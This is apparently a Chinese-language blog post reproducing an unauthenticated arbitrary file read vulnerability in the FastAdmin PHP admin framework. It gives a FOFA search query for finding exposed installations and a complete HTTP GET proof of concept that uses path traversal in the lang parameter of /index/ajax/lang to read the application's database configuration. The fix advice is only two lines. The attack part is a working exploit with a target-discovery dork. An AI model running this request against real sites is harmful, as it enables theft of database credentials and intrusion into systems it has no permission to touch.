FastAdmin后台开发框架 lang 任意文件读取漏洞复现

0x01 产品简介

FastAdmin是一款基于PHP+Bootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。

0x02 漏洞概述

FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x04 漏洞复现

PoC

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

读取数据库配置

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
黑客大佬13 分钟前
红队攻防 | 利用GitLab nday实现帐户接管
运维·网络·学习·nginx·安全·gitlab
怀后同学.16 分钟前
sql-libs第三关详细解答
数据库·sql·安全·网络安全
xunznux1 小时前
Java 面试题:从源码理解 ThreadLocal 如何解决内存泄漏 & ConcurrentHashMap 如何保证并发安全 --xunznux
java·jvm·笔记·后端·安全·面试
小Z资本1 小时前
加密技术.
运维·安全·密码学
镭速5 小时前
镭速助力构筑ICT安全高效的大文件传输
安全
燕雀安知鸿鹄之志哉.10 小时前
web渗透:SSRF漏洞
网络·笔记·安全·web安全·网络安全
H_kiwi10 小时前
Web3开发与安全:6个月高效学习路径
学习·安全·网络安全·web3·区块链·安全威胁分析
飞酱不会电脑11 小时前
云计算第二阶段---DBA Day8-Day9
数据库·安全·云计算·dba
恒拓高科WorkPlus12 小时前
WorkPlus安全即时通讯:端到端加密开启信息保密新时代
运维·网络·安全